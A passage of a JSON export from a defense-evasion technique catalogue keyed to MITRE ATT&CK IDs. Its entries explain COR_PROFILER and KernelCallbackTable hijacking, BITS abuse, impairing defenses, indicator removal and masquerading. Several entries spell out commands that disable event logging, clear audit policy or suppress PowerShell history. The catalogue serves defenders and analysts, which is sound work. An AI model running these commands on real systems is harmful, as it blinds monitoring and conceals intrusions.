"key": "hijack-execution-flow-cor_profiler",
"unprotect_id": "T1574.012",
"name": "Hijack Execution Flow: COR_PROFILER",
"description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\r\n\r\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a Component Object Model (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.\r\n\r\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: Bypass User Account Control) if the victim .NET process executes at a higher permission level, as well as to hook and Impair Defenses provided by .NET processes.",
"resources": "https://attack.mitre.org/techniques/T1574/012/",
"creation_date": "2023-01-31T04:36:31.132000Z",
"tags": "Persistence, \r\nPrivilege Escalation, \r\nDefense Evasion,\r\n.NET CLR,\r\nCommon Language Runtime (CLR),\r\nComponent Object Model (COM),\r\nCOR_PROFILER_PATH,\r\nCOR_PROFILER,\r\nBypass User Account Control,\r\nImpair Defenses,\r\nmalicious DLL,\r\nsystem environment variables,\r\n.NET Framework 4,",
"modification_date": "2023-10-04T10:44:10.824000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 256,
"key": "hijack-execution-flow-kernelcallbacktable",
"unprotect_id": "T1574.013",
"name": "Hijack Execution Flow: KernelCallbackTable",
"description": "Adversaries may abuse the KernelCallbackTable of a process to hijack its execution flow in order to run their own payloads. The KernelCallbackTable can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll is loaded.\r\n\r\nAn adversary may hijack the execution flow of a process using the KernelCallbackTable by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as Reflective Code Loading or Process Injection into another process.\r\n\r\nA pointer to the memory address of the KernelCallbackTable can be obtained by locating the PEB (ex: via a call to the NtQueryInformationProcess() Native API function). Once the pointer is located, the KernelCallbackTable can be duplicated, and a function in the table (e.g., fnCOPYDATA) set to the address of a malicious payload (ex: via WriteProcessMemory()). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.\r\n\r\nThe tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the KernelCallbackTable may also be restored to its original state by the rest of the malicious payload. Use of the KernelCallbackTable to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.",
"resources": "https://attack.mitre.org/techniques/T1574/013/",
"creation_date": "2023-01-31T04:40:08.137000Z",
"tags": "Persistence, \r\nPrivilege Escalation,\r\nDefense Evasion,\r\nduplicate KernelCallbackTable,\r\nProcess Environment Block (PEB),\r\nuser32.dll,\r\nReflective Code Loading,\r\nProcess Injection,\r\nhijack execution flow,\r\nhijack process control flow,\r\nmemory tampering,\r\nmalicious memory address,\r\nWindows message,",
"modification_date": "2023-10-04T10:44:58.916000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 257,
"key": "bits-jobs",
"unprotect_id": "T1197",
"name": "BITS Jobs",
"description": "Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\r\n\r\nThe interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.\r\n\r\nAdversaries may abuse BITS to download (e.g. Ingress Tool Transfer), execute, and even clean up after running malicious code (e.g. Indicator Removal). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).\r\n\r\nBITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.",
"resources": "https://attack.mitre.org/techniques/T1197/",
"creation_date": "2023-01-31T04:43:48.619000Z",
"tags": "Defense Evasion, \r\nPersistence,\r\nWindows Background Intelligent Transfer Service (BITS),\r\nBITSAdmin tool,\r\nComponent Object Model (COM),\r\nexecute mailicious code,\r\nperform background tasks,\r\njob creation,\r\nExfiltration Over Alternative Protocol,\r\nAPT39,\r\nAPT41,\r\npayload download,\r\nIndicator Removal,",
"modification_date": "2023-10-04T10:44:11.847000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 258,
"key": "debugger-evasion",
"unprotect_id": "T1622",
"name": "Debugger Evasion",
"description": "Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.\r\n\r\nDebugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to Virtualization/Sandbox Evasion, if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.\r\n\r\nSpecific checks will vary based on the target and/or adversary, but may involve Native API function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would \"swallow\" or handle the potential error).\r\n\r\nAdversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping Native API function calls such as OutputDebugStringW().",
"resources": "https://attack.mitre.org/techniques/T1622/",
"creation_date": "2023-01-31T04:46:31.665000Z",
"tags": "Defense Evasion, \r\nDiscovery,\r\ncheck for debugged environment,\r\nIsDebuggerPresent(),\r\nNtQueryInformationProcess(),\r\nBeingDebugged flag,\r\nProcess Environment Block (PEB),\r\nOutputDebugStringW(),\r\ndebugging prevention,",
"modification_date": "2023-10-04T10:44:14.923000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 259,
"key": "deobfuscatedecode-files-or-information",
"unprotect_id": "T1140",
"name": "Deobfuscate/Decode Files or Information",
"description": "Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\r\n\r\nOne such example is use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file. Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. \r\n\r\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.",
"resources": "https://attack.mitre.org/techniques/T1140/",
"creation_date": "2023-01-31T04:49:40.484000Z",
"tags": "Defense Evasion,\r\ncertutil,\r\nWindows copy /b command,\r\nAPT19,\r\nAPT28,\r\nAPT29,\r\nAPT39,\r\ndecryption,",
"modification_date": "2023-10-04T10:44:06.332000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 260,
"key": "direct-volume-access",
"unprotect_id": "T1006",
"name": "Direct Volume Access",
"description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. \r\n\r\nUtilities, such as NinjaCopy, exist to perform these actions in PowerShell.",
"resources": "https://attack.mitre.org/techniques/T1006/",
"creation_date": "2023-01-31T04:51:45.101000Z",
"tags": "Defense Evasion,\r\nbypass file action control,\r\nbypass file system monitoring,\r\ndirect access to logical volumes,\r\nNinjaCopy,",
"modification_date": "2023-10-04T10:42:07.369000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 261,
"key": "exploitation-for-defense-evasion",
"unprotect_id": "T1211",
"name": "Exploitation for Defense Evasion",
"description": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\r\n\r\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for Security Software Discovery. The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.",
"resources": "https://attack.mitre.org/techniques/T1211/",
"creation_date": "2023-01-31T04:53:59.414000Z",
"tags": "Defense Evasion,\r\nbypass security features,\r\nSecurity Software Discovery,\r\nAPT28,\r\nvulnerability exploitation",
"modification_date": "2023-10-04T10:42:38.649000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 262,
"key": "impair-defenses-disable-or-modify-tools",
"unprotect_id": "T1562.001",
"name": "Impair Defenses: Disable or Modify Tools",
"description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.\r\n\r\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to Indicator Blocking, adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.\r\n\r\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools. For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.\r\n\r\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. Exploitation for Privilege Escalation), which may lead to bypassing anti-tampering features.",
"resources": "https://attack.mitre.org/techniques/T1562/001/",
"creation_date": "2023-02-07T00:02:20.725000Z",
"tags": "Defense Evasion,\r\nbypass event aggregation,\r\nbypass analysis mechanisms,\r\nbypass security tools,\r\nbypass anti-tampering,\r\ndisable updates,\r\nAPT29,\r\nartifact tampering,\r\nGMER,\r\ndriver exploitation,",
"modification_date": "2023-10-04T10:44:59.222000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 263,
"key": "impair-defenses-disable-windows-event-logging",
"unprotect_id": "T1562.002",
"name": "Impair Defenses: Disable Windows Event Logging",
"description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more. This data is used by security tools and analysts to generate detections.\r\n\r\nThe EventLog service maintains event logs from various system components and applications. By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\\Local Policies\\Audit Policy for basic audit policy settings or Security Settings\\Advanced Audit Policy Configuration for advanced audit policy settings. auditpol.exe may also be used to set audit policies.\r\n\r\nAdversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog. Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:\"Account Logon\" /success:disable /failure:disable turns off auditing for the Account Logon category. To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.",
"resources": "https://attack.mitre.org/techniques/T1562/002/",
"creation_date": "2023-02-07T00:12:57.052000Z",
"tags": "Defense Evasion,\r\nevent disabling,\r\nEventLog service,\r\nLocal Security Policy (secpol.msc),\r\nauditpol.exe,\r\n/success parameters,\r\n/failure parameters,\r\nStop-Service -Name EventLog,\r\nauditpol /clear /y,\r\nauditpol /remove /allusers,\r\nSecurity Settings\\Local Policies\\Audit Policy,\r\nSecurity Settings\\Advanced Audit Policy Configuration,\r\nAPT29,",
"modification_date": "2023-10-04T10:44:11.085000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 264,
"key": "impair-defenses-impair-command-history-logging",
"unprotect_id": "T1562.003",
"name": "Impair Defenses: Impair Command History Logging",
"description": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\r\n\r\nOn Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.\r\n\r\nAdversaries may also leverage a Network Device CLI on network devices to disable historical command logging (e.g. no logging).",
"resources": "https://attack.mitre.org/techniques/T1562/003/",
"creation_date": "2023-02-07T00:17:23.193000Z",
"tags": "Defense Evasion,\r\nPSReadLine,\r\nConsoleHost_history.txt,\r\n$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\,\r\nSet-PSReadLineOption -HistorySavePath {File Path},\r\nSet-PSReadlineOption -HistorySaveStyle SaveNothing,\r\nNetwork Device CLI,\r\nAPT38,\r\ndisable logging,\r\ndisable historical command logging,",
"modification_date": "2023-10-04T10:44:11.334000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 265,
"key": "impair-defenses-disable-or-modify-system-firewall",
"unprotect_id": "T1562.004",
"name": "Impair Defenses: Disable or Modify System Firewall",
"description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\r\n\r\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.",
"resources": "https://attack.mitre.org/techniques/T1562/004/",
"creation_date": "2023-02-07T00:21:03.440000Z",
"tags": "Defense Evasion,\r\nbypass firewall, \r\ndisable firewall,\r\nmodify firewall rules,\r\nAPT29,\r\nAPT38,\r\nenable adversary C2 communications,\r\nlateral movement, \r\ndata exfiltration,",
"modification_date": "2023-10-04T10:44:05.085000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 266,
"key": "impair-defenses-indicator-blocking",
"unprotect_id": "T1562.006",
"name": "Impair Defenses: Indicator Blocking",
"description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting or even disabling host-based sensors, such as Event Tracing for Windows (ETW), by tampering settings that control the collection and flow of event telemetry. These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as PowerShell or Windows Management Instrumentation.\r\n\r\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the PowerShell Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\r\n\r\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.",
"resources": "https://attack.mitre.org/techniques/T1562/006/",
"creation_date": "2023-02-07T00:28:37.250000Z",
"tags": "Defense Evasion,\r\ndisabling host-based sensors,\r\nevent telemetry tampering,\r\nEvent Tracing for Windows (ETW),\r\nbypass ETW,\r\nblocking reporting traffic,\r\nPowerShell Set-EtwTraceProvider,\r\nregistry tampering,\r\nbypassing SIEM alerts,",
"modification_date": "2023-10-04T10:44:07.778000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 267,
"key": "impair-defenses-safe-mode-boot",
"unprotect_id": "T1562.009",
"name": "Impair Defenses: Safe Mode Boot",
"description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.\r\n\r\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.\r\n\r\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. Modify Registry). Malicious Component Object Model (COM) objects may also be registered and loaded in safe mode.",
"resources": "https://attack.mitre.org/techniques/T1562/009/",
"creation_date": "2023-02-07T00:32:08.111000Z",
"tags": "Defense Evasion,\r\ndisable endpoint defenses,\r\nWindows safe mode,\r\nBoot Configuration Data (BCD),\r\nregistry modification,\r\nmalicious Component Object Model (COM) objects,\r\nbypass EDR,\r\ndisable endpoint defences,",
"modification_date": "2023-10-04T10:42:27.206000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 268,
"key": "impair-defenses-downgrade-attack",
"unprotect_id": "T1562.010",
"name": "Impair Defenses: Downgrade Attack",
"description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, PowerShell versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to Impair Defenses while running malicious scripts that may have otherwise been detected.\r\n\r\nAdversaries may downgrade and use less-secure versions of various features of a system, such as Command and Scripting Interpreters or even network protocols that can be abused to enable Adversary-in-the-Middle.",
"resources": "https://attack.mitre.org/techniques/T1562/010/",
"creation_date": "2023-02-07T00:35:20.611000Z",
"tags": "Defense Evasion,\r\ndowngrading Windows,\r\nScript Block Logging (SBL),\r\nremoving features,\r\nexecute malicious scripts,\r\nAdversary-in-the-Middle.",
"modification_date": "2023-10-04T10:44:10.420000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 269,
"key": "indicator-removal-clear-command-history",
"unprotect_id": "T1070.003",
"name": "Indicator Removal: Clear Command History",
"description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\r\n\r\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\r\n\r\nThe PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.\r\n\r\nAdversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.",
"resources": "https://attack.mitre.org/techniques/T1070/003/",
"creation_date": "2023-02-07T00:42:27.729000Z",
"tags": "Defense Evasion,\r\nclear CLI history,\r\nPSReadLine,\r\n$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt,\r\nClear-History,\r\nConsoleHost_history.txt,\r\nAPT41,\r\nlog file deletion,",
"modification_date": "2023-10-04T10:42:29.451000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 270,
"key": "indicator-removal-file-deletion",
"unprotect_id": "T1070.004",
"name": "Indicator Removal: File Deletion",
"description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\r\n\r\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. An example of built-in Command and Scripting Interpreter functions is del on Windows.",
"resources": "https://attack.mitre.org/techniques/T1070/004/",
"creation_date": "2023-02-07T01:08:44.043000Z",
"tags": "Defense Evasion,\r\ninfection clean-up,\r\ndel,\r\nevidence removal,",
"modification_date": "2023-10-04T10:43:35.632000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 271,
"key": "indicator-removal-network-share-connection-removal",
"unprotect_id": "T1070.005",
"name": "Indicator Removal: Network Share Connection Removal",
"description": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and SMB/Windows Admin Shares connections can be removed when no longer needed. Net is an example utility that can be used to remove network share connections with the net use \\system\\share /delete command.",
"resources": "https://attack.mitre.org/techniques/T1070/005/",
"creation_date": "2023-02-07T01:10:50.149000Z",
"tags": "Defense Evasion,\r\nnet use \\system\\share /delete,\r\nSMB share,\r\ndisconnect network shares,",
"modification_date": "2023-10-04T10:43:54.694000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 272,
"key": "indicator-removal-clear-network-connection-history-and-configurations",
"unprotect_id": "T1070.007",
"name": "Indicator Removal: Clear Network Connection History and Configurations",
"description": "Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system from behaviors that require network connections, such as Remote Services or External Remote Services. Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.\r\n\r\nNetwork connection history may be stored in various locations on a system. For example, RDP connection history may be stored in Windows Registry values under:\r\n\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\r\nWindows may also store information about recent RDP connections in files such as C:\\Users\\%username%\\Documents\\Default.rdp and C:\\Users\\%username%\\AppData\\Local\\Microsoft\\TerminalServer Client\\Cache\\. \r\n\r\nMalicious network connections may also require changes to network configuration settings, such as Disable or Modify System Firewall or tampering to enable Proxy. Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.",
"resources": "https://attack.mitre.org/techniques/T1070/007/",
"creation_date": "2023-02-07T03:00:35.870000Z",
"tags": "Defense Evasion,\r\nNetwork history deletion,\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default,\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers,\r\nC:\\Users\\%username%\\Documents\\Default.rdp,\r\nC:\\Users\\%username%\\AppData\\Local\\Microsoft\\TerminalServer Client\\Cache,\r\ndisable firewall rule,\r\nmodify firewall,\r\nadd firewall rule,\r\nmodify network configuration,\r\nbypass firewall rule,\r\nenable Proxy,",
"modification_date": "2023-10-04T10:44:29.265000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 273,
"key": "indicator-removal-clear-mailbox-data",
"unprotect_id": "T1070.008",
"name": "Indicator Removal: Clear Mailbox Data",
"description": "Adversaries may modify mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails or logs generated by the application or operating system, such as export requests.\r\n\r\nAdversaries may manipulate email mailbox data to remove logs and artifacts, such as evidence of Phishing/Internal Spearphishing, Email Collection, Mail Protocols for command and control, or email-based exfiltration such as Exfiltration Over Alternative Protocol. For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell PowerShell module, including Remove-MailboxExportRequest to remove evidence of mailbox exports.",
"resources": "",
"creation_date": "2023-02-07T05:33:13.414000Z",
"tags": "Defense Evasion,\r\nexport mailbox data,\r\ndelete mailbox data,\r\nExfiltration Over Alternative Protocol,\r\nRemove-MailboxExportRequest,",
"modification_date": "2023-10-04T10:40:14.313000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 274,
"key": "indicator-removal-clear-persistence",
"unprotect_id": "T1070.009",
"name": "Indicator Removal: Clear Persistence",
"description": "Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, Modify Registry, Plist File Modification, or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.\r\n\r\nIn some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.",
"resources": "https://attack.mitre.org/techniques/T1070/009/",
"creation_date": "2023-02-07T05:35:59.751000Z",
"tags": "Defense Evasion,\r\nevidence removal,\r\nevidence clean-up,\r\nartifacts of persistence removal,\r\nregistry key removal,",
"modification_date": "2023-10-04T10:44:05.889000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 275,
"key": "indirect-command-execution",
"unprotect_id": "T1202",
"name": "Indirect Command Execution",
"description": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking cmd. \r\n\r\nAdversaries may abuse these features for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd or file extensions more commonly associated with malicious payloads.",
"resources": "https://attack.mitre.org/techniques/T1202/",
"creation_date": "2023-02-07T05:39:23.235000Z",
"tags": "Defense Evasion,\r\nCommand execution concealment,\r\nperform arbitrary execution,\r\nExploit CLIs,",
"modification_date": "2023-10-04T10:44:06.576000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 277,
"key": "masquerading-invalid-code-signature",
"unprotect_id": "T1036.001",
"name": "Masquerading: Invalid Code Signature",
"description": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.\r\n\r\nUnlike Code Signing, this activity will not result in a valid signature.",
"resources": "https://attack.mitre.org/techniques/T1036/001/",
"creation_date": "2023-02-10T00:56:50.010000Z",
"tags": "Defense Evasion,\r\nImpersonating valid code signatures,\r\nAPT37,\r\ninvalid code signatures ,\r\ninvalid digital certificates,\r\nunverified signatures,\r\nfake certificates,\r\nrevoked certificates,",
"modification_date": "2023-10-04T10:44:06.718000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 278,
"key": "masquerading-right-to-left-override",
"unprotect_id": "T1036.002",
"name": "Masquerading: Right-to-Left Override",
"description": "Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png.\r\n\r\nAdversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with Spearphishing Attachment/Malicious File since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity. RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.",
"resources": "https://attack.mitre.org/techniques/T1036/002/",
"creation_date": "2023-02-10T01:05:54.520000Z",
"tags": "Defense Evasion,\r\nRTLO, \r\nRLO,\r\nobfuscate filenames,\r\nreverse executable names,",
"modification_date": "2023-10-04T10:42:29.587000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 279,
"key": "masquerading-rename-system-utilities",
"unprotect_id": "T1036.003",
"name": "Masquerading: Rename System Utilities",
"description": "Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths.",
"resources": "https://attack.mitre.org/techniques/T1036/003/",
"creation_date": "2023-02-10T01:10:22.955000Z",
"tags": "Defense Evasion,\r\nrename legitimate file,\r\nAPT32,\r\nreplace legitimate system file,",
"modification_date": "2023-10-04T10:44:10.569000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 280,
"key": "masquerading-masquerade-task-or-service",
"unprotect_id": "T1036.004",
"name": "Masquerading: Masquerade Task or Service",
"description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description. Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\r\n\r\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.",
"resources": "https://attack.mitre.org/techniques/T1036/004/",
"creation_date": "2023-02-10T01:14:05.681000Z",
